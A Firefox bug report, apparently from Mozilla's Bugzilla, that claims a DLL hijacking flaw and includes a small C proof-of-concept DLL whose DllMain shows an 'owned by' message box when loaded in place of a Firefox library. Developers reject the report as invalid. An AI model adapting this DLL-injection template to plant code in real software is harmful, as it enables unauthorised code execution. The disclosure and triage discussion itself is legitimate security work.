browserdirprovider.dll and brwsrcmp.dll is prone to DLL hijacking vulnerability

VERIFIED INVALID

Status

()

Firefox
Security
--
critical
VERIFIED INVALID
7 years ago
7 years ago

People

(Reporter: again.liu, Unassigned)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

(Reporter)

Description

7 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12

A malicious DLL could be used to replace either browserdirprovider.dll or brwsrcmp.dll to perform arbitrary code.

Reproducible: Always

Steps to Reproduce:
complie the following code
Compiler : VC++ 2010 express
           Release 
           Runtime Library: Multi-threaded (/MT)
===============================================================================
#include<Windows.h>

void init()
{
	MessageBoxA(NULL, "owned by moigai", "injected!!", MB_OK);
}

BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
	switch(ul_reason_for_call)
	{
		case DLL_PROCESS_ATTACH:
			init();
			break;
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
			break;
	}
	return TRUE;
}
===============================================================================

And then replace the previous mentioned two DLL (either will do), then start firefox.
Actual Results:  
The message box coded will popup when starting firefox.

Comment 1

7 years ago
Yes, if you replace Firefox files, you can break it. That's not exactly news ;-)
Group: core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 7 years ago
Resolution: --- → INVALID
Duplicate of this bug: 609251

Comment 3

7 years ago
You could also replace firefox.exe with:

void main() {
 for(;;);
}

The effects would be left as an exercise for the reader!  ;-)
Status: RESOLVED → VERIFIED
> Yes, if you replace Firefox files, you can break it. That's not exactly news

Nor is it what's meant by "DLL hijacking".
Duplicate of this bug: 614530
You need to log in before you can comment on or make changes to this bug.